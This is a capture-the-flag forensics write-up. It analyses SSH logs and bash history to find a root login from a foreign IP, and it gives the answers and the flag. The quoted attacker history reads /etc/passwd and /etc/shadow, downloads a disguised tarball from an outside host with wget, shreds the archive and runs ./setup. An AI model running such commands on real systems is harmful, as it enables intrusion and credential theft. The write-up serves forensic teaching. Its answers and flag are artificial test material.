<- FORENSICS

An unusual sighting

4 minutes to read

We are given the following files:

$ file *
bash_history.txt: ASCII text  
sshd.log:         ASCII text

These are files from a Linux server. The bash_history.txt refers to the history of commands executed in Bash, whereas the sshd.log is a log for events related to SSH sessions.

We have a remote instance where we must answer some questions:

$ nc 94.237.51.149 43642

+---------------------+---------------------------------------------------------------------------------------------------------------------+  
|        Title        |                                                     Description                                                     |
+---------------------+---------------------------------------------------------------------------------------------------------------------+
| An unusual sighting |                        As the preparations come to an end, and The Fray draws near each day,                        |
|                     |             our newly established team has started work on refactoring the new CMS application for the competition. |
|                     |                  However, after some time we noticed that a lot of our work mysteriously has been disappearing!     |
|                     |                     We managed to extract the SSH Logs and the Bash History from our dev server in question.        |
|                     |               The faction that manages to uncover the perpetrator will have a massive bonus come the competition!   |
|                     |                                                                                                                     |
|                     |                                            Note: Operating Hours of Korp: 0900 - 1900                               |
+---------------------+---------------------------------------------------------------------------------------------------------------------+


Note 2: All timestamps are in the format they appear in the logs

Question 1

What is the IP Address and Port of the SSH Server (IP:PORT)

This question is quite easy to answer, because we will see a lot of occurences of this IP and port in the sshd.log file:

[2024-01-19 12:59:11] Server listening on 0.0.0.0 port 2221.
[2024-01-19 12:59:11] Server listening on :: port 2221.
[2024-01-28 15:24:23] Connection from 100.72.1.95 port 47721 on 100.107.36.130 port 2221 rdomain ""  
...

So, the server is at 100.107.36.130, and listens on port 2221 for SSH connections:

> 100.107.36.130:2221  
[+] Correct!

Question 2

What time is the first successful Login

The first successful login is here, because it says “Accepted password for root”:

...
[2024-02-13 11:29:50] Connection from 100.81.51.199 port 63172 on 100.107.36.130 port 2221 rdomain ""
[2024-02-13 11:29:50] Failed publickey for root from 100.81.51.199 port 63172 ssh2: ECDSA SHA256:NdSnAx2935O7s2KX4LyvIV0gCzzQW5eXYoiiIBosqNE  
[2024-02-13 11:29:50] Accepted password for root from 100.81.51.199 port 63172 ssh2
[2024-02-13 11:29:50] Starting session: shell on pts/2 for root from 100.81.51.199 port 63172 id 0
...

> 2024-02-13 11:29:50  
[+] Correct!

Question 3

What is the time of the unusual Login

The unusual login is this one because it logs as root and the connection comes from an IP address that is way different than the ones seen in the SSH log:

...
[2024-02-19 04:00:14] Connection from 2.67.182.119 port 60071 on 100.107.36.130 port 2221 rdomain ""
[2024-02-19 04:00:14] Failed publickey for root from 2.67.182.119 port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4  
[2024-02-19 04:00:14] Accepted password for root from 2.67.182.119 port 60071 ssh2
[2024-02-19 04:00:14] Starting session: shell on pts/2 for root from 2.67.182.119 port 60071 id 0
[2024-02-19 04:38:17] syslogin_perform_logout: logout() returned an error
[2024-02-19 04:38:17] Received disconnect from 2.67.182.119 port 60071:11: disconnected by user
[2024-02-19 04:38:17] Disconnected from user root 2.67.182.119 port 60071
...

> 2024-02-19 04:00:14  
[+] Correct!

Question 4

What is the Fingerprint of the attacker's public key

The fingerprint of the public key can be taken from the previous evidence:

...
[2024-02-19 04:00:14] Failed publickey for root from 2.67.182.119 port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4  
...

> OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4  
[+] Correct!

Question 5

What is the first command the attacker executed after logging in

Now, we need to analyze commands executed by the attacker, so let’s switch to the bash_history.txt, focusing at commands executed around the previous timestamp (2024-02-19 04:00:14):

...
[2024-02-16 14:40:47] python ./server.py --tests
[2024-02-19 04:00:18] whoami
[2024-02-19 04:00:20] uname -a
[2024-02-19 04:00:40] cat /etc/passwd
[2024-02-19 04:01:01] cat /etc/shadow
[2024-02-19 04:01:15] ps faux
[2024-02-19 04:02:27] wget https://gnu-packages.com/prebuilts/iproute2/latest.tar.gz -O /tmp/latest_iproute.tar.gz  
[2024-02-19 04:10:02] tar xvf latest.tar.gz
[2024-02-19 04:12:02] shred -zu latest.tar.gz
[2024-02-19 04:14:02] ./setup
[2024-02-20 11:11:14] nvim server.py
...

So, the first command is whoami:

> whoami
[+] Correct!

Question 6

What is the final command the attacker executed before logging out

And the answer here is already shown in the previous output, which is ./setup:

> ./setup
[+] Correct!

Flag

At this point, we have the flag:

[+] Here is the flag: HTB{4n_unusual_s1ght1ng_1n_SSH_l0gs!}